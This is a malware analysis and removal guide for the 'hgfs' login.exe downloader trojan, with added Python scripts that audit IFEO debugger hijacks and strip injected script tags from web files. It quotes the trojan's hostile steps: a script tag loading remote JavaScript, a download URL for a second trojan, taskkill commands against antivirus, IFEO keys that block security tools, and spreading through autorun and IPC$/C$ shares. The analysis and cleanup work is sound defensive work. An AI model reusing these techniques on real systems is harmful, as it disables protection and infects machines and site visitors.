login.exe "hgfs" downloader Trojan: analysis and manual removal

Source: Internet
Author: User
Sample information:
File: login.exe
Size: 25428 bytes
Modified: 2008-04-25 16:30:08
MD5: 9777e8c79312f2e3d175aa1f64b07c11
SHA1: 4236d76c4faefe1cdf22414a25e946e493e0d52e
CRC32: 5a562203

1. Initialization: creates a mutex named Hgfsmutex so that only one instance of the Trojan runs at a time.

2. Drops the following files:
%systemroot%\system32\autorun.exe
%systemroot%\system32\autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
and copies itself into the following Startup folders so that it is launched at every logon:
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\login.exe
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\login.exe
C:\Documents and Settings\Default User\Start Menu\Programs\Startup\login.exe

3. Contents of the connnet.bat batch file

A. Iterates over drives D: through Z: and copies %systemroot%\system32\autorun.inf and %systemroot%\system32\autorun.exe to the root of each one, so that autorun.exe is launched when the drive is opened on a machine with AutoRun enabled.

B. Checks whether the infected machine is on a LAN; if so, it establishes an IPC$ null session to other hosts (the so-called "IPC$ vulnerability") and copies autorun.exe and autorun.inf into their C$ share. The copy only succeeds against hosts whose C$ administrative share accepts the connection, typically those with a blank or guessable administrator password.

4. IFEO hijack of antivirus software
Creates the following Image File Execution Options keys:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
Each key's Debugger value points to c:\\I'm not going to start you.exe, a file that does not exist. Because Windows runs the IFEO "debugger" in place of the named program, every attempt to start one of these antivirus executables fails.

5. Attempts to terminate the 360 processes:
cmd /c taskkill /im 360safe.exe /f
cmd /c taskkill /im 360tray.exe /f

6. Traverses all drives and deletes .gho (Ghost disk image) files, destroying backups that could be used to restore a clean system.

7. Traverses all drives and infects asp, htm, html, aspx, php and similar web files by appending the following to the end of each one:
<script language=javascript src=http://down.******.cn/1.js></script>
Any visitor to a page served from an infected file then loads the remote script.

8. Downloads a further Trojan from
http://17vp.cn/down/gr.exe
and saves it as
C:\Program Files\Internet Explorer\1.exe
The link was already dead at the time of analysis.
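To check a machine for the IFEO hijack described in step 4 (and to confirm afterwards that the registry cleanup actually took), here is an added Python example; it is not code from the original analysis. It enumerates every Image File Execution Options subkey that carries a Debugger value and flags entries whose debugger image does not exist on disk (the trick this sample uses), entries that redirect one of the security product names listed above, and entries whose debugger is not on a small allow-list of real debuggers (the allow-list is an assumption and should be extended for your environment). The registry enumeration needs Windows; the classification is a pure function, so it can be exercised offline with constructed entries.

```python
"""Audit Image File Execution Options (IFEO) for Debugger hijacks.

Added example, not part of the original analysis. The login.exe/hgfs sample
sets Debugger values for 360safe.exe, 360tray.exe, ravmon.exe, ravmond.exe,
ravstub.exe and ravtask.exe that point at a non-existent file, so Windows
fails to start those antivirus processes.
"""
import ntpath
import os
import sys

IFEO_PATH = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

# Process names this sample hijacks (from the analysis above).
HIJACKED_BY_SAMPLE = {
    "360safe.exe", "360tray.exe", "ravmon.exe",
    "ravmond.exe", "ravstub.exe", "ravtask.exe",
}

# Assumption: debuggers that legitimately appear in IFEO on a developer box.
KNOWN_DEBUGGERS = ("vsjitdebugger.exe", "windbg.exe", "drwtsn32.exe", "ntsd.exe", "cdb.exe")


def debugger_image(debugger_value):
    """Return the executable path from a Debugger value, dropping arguments.
    Quoted values ("C:\\x y\\dbg.exe" -p) are unquoted; for unquoted values
    the first whitespace-delimited token is taken."""
    value = debugger_value.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        return value[1:end] if end > 0 else value[1:]
    return value.split(" ", 1)[0]


def classify_ifeo(entries, path_exists=os.path.exists):
    """entries: iterable of (subkey_name, debugger_value_or_None).

    Returns [(subkey_name, debugger_value, reason)] for suspicious entries.
    path_exists is injectable so the logic can be tested without the registry.
    """
    findings = []
    for name, debugger in entries:
        if not debugger:
            continue  # subkey without a Debugger value cannot redirect a launch
        image = debugger_image(debugger)
        base = ntpath.basename(image).lower()
        if not path_exists(image):
            findings.append((name, debugger, "debugger image does not exist"))
        elif name.lower() in HIJACKED_BY_SAMPLE:
            findings.append((name, debugger, "security product redirected"))
        elif base not in KNOWN_DEBUGGERS:
            findings.append((name, debugger, "unrecognised debugger"))
    return findings


def removal_command(subkey_name):
    """The reg.exe command that removes a hijacking subkey (run as Administrator)."""
    return 'reg delete "HKLM\\%s\\%s" /f' % (IFEO_PATH, subkey_name)


def read_ifeo_from_registry():
    """Enumerate IFEO subkeys and their Debugger values (Windows only)."""
    import winreg  # available only on Windows
    entries = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, IFEO_PATH) as root:
        index = 0
        while True:
            try:
                name = winreg.EnumKey(root, index)
            except OSError:
                break  # no more subkeys
            index += 1
            with winreg.OpenKey(root, name) as sub:
                try:
                    debugger, _ = winreg.QueryValueEx(sub, "Debugger")
                except FileNotFoundError:
                    debugger = None
            entries.append((name, debugger))
    return entries


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("run this on the affected Windows machine")
    for name, dbg, why in classify_ifeo(read_ifeo_from_registry()):
        print(f"{name}: Debugger={dbg!r} ({why})")
        print("  " + removal_command(name))
```

Run it as Administrator on the affected machine. Deleting a flagged subkey restores normal launching of that program; the script prints the matching reg delete command for each finding, which is the same cleanup the SREng step in the removal section performs through its GUI.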

Removal:

1. Copy the following list of paths to the clipboard (assuming the system is installed on drive C:):
%systemroot%\system32\autorun.exe
%systemroot%\system32\autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\login.exe
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\login.exe
C:\Documents and Settings\Default User\Start Menu\Programs\Startup\login.exe
Also add autorun.inf and autorun.exe from the root of every other drive (D: to Z:, see step 3A of the analysis) and, on a LAN, from the C$ share of any host the Trojan reached; otherwise opening one of those drives reinfects the machine.


Open XDelBox.exe.
Right-click in the large list box and choose "Import from clipboard" (leave "check path" unticked).
The files you just copied appear in the list.
Right-click the list again and choose "Reboot now and delete".
The program reboots the computer.

After the reboot a boot menu with two entries and a countdown appears:
the first entry is your original Windows installation,
the second is the DOS environment that XDelBox has set up.
Without any action on your part the second entry is selected automatically.
Once the DOS-style screen has scrolled past, the listed files have been deleted,
and the machine reboots back into Windows normally.

2. Open SREng, go to Startup entries > Registry,
and delete all IFEO items shown in red (the six entries listed in step 4 of the analysis).

3. Block the domain 17vp.cn (for example via the hosts file or a firewall rule).
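The removal steps above cover the dropped executables and the IFEO keys but not the asp/htm/html/aspx/php files the sample modified in step 7 of the analysis, and a web site served from those files keeps pushing the remote script to visitors until they are cleaned. The following is an added Python example, not code from the original page: it walks a directory, strips the appended script tag from every file with one of the listed extensions, and reports what it changed. Because the host in the analysis is masked (down.******.cn), the tag is matched on its structure and on the file name 1.js rather than on the host; the sample site it builds when run without arguments is constructed here, with example.cn standing in for the masked host.

```python
"""Strip the injected <script ... src=http://.../1.js></script> tag from web files.

Added example, not part of the original analysis. Run with a directory
argument to clean a real web root in place; with no argument it runs on a
constructed sample site in a temporary directory.
"""
import os
import re
import sys
import tempfile

WEB_EXTENSIONS = {".asp", ".aspx", ".htm", ".html", ".php"}

# Matches the appended tag with or without quotes around the src value, on any
# http/https host, plus any whitespace written after it. The host is masked in
# the analysis, so only the structure and the file name 1.js are matched.
INJECTED_TAG = re.compile(
    rb"<script\s+language=javascript\s+src=[\"']?"
    rb"https?://[^\s\"'>]+/1\.js[\"']?\s*>\s*</script>\s*",
    re.IGNORECASE,
)

# Constructed sample tag; example.cn stands in for the masked host.
SAMPLE_TAG = b"<script language=javascript src=http://down.example.cn/1.js></script>"


def strip_injected_tag(data):
    """Return (cleaned bytes, number of tags removed)."""
    return INJECTED_TAG.subn(b"", data)


def disinfect_tree(root):
    """Walk root, rewrite infected web files in place and return
    {path: tags_removed} for every file that was changed."""
    modified = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() not in WEB_EXTENSIONS:
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                data = fh.read()
            cleaned, count = strip_injected_tag(data)
            if count:
                with open(path, "wb") as fh:
                    fh.write(cleaned)
                modified[path] = count
    return modified


# Constructed sample site: one page hit once, one hit twice (the Trojan appends
# on every run), one clean page, and a non-page file that must be left alone.
SAMPLE_SITE = {
    "index.html": b"<html><body>hi</body></html>\n" + SAMPLE_TAG,
    "page.asp": b"<% Response.Write(1) %>" + SAMPLE_TAG + SAMPLE_TAG,
    "clean.php": b"<?php echo 1; ?>\n",
    "site.css": b"body{}" + SAMPLE_TAG,
}


def demo():
    """Build the constructed site in a temp dir, clean it, and return
    ({relative name: tags removed}, {relative name: final bytes})."""
    root = tempfile.mkdtemp(prefix="hgfs_clean_")
    for name, data in SAMPLE_SITE.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    modified = disinfect_tree(root)
    contents = {}
    for name in SAMPLE_SITE:
        with open(os.path.join(root, name), "rb") as fh:
            contents[name] = fh.read()
    return ({os.path.relpath(p, root): c for p, c in modified.items()}, contents)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, count in disinfect_tree(sys.argv[1]).items():
            print(f"{path}: removed {count} tag(s)")
    else:
        print(demo()[0])
```

Take the site offline or work on a copy first, and keep a backup of the web root before rewriting files in place; if the infected pages are also in a CDN or proxy cache, purge that as well.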
